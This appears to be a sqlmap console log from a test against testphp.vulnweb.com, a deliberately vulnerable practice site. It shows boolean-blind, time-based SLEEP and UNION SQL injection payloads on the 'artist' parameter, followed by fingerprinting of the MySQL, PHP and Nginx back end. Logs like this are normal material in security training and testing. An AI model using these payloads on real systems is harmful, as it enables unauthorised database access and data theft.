        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.9.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:49:58 /2024-11-08/

[15:49:58] [INFO] resuming back-end DBMS 'mysql' 
[15:49:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4931=4931

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 5142 FROM (SELECT(SLEEP(5)))CBhM)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: artist=-1119 UNION ALL SELECT CONCAT(0x717a767671,0x4e614466415745664e676441534853517a636b4b61517549724a5774484a47666c774c626d6b5245,0x7176627071),NULL,NULL#
---
[15:49:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[15:49:59] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 15:49:59 /2024-11-08/

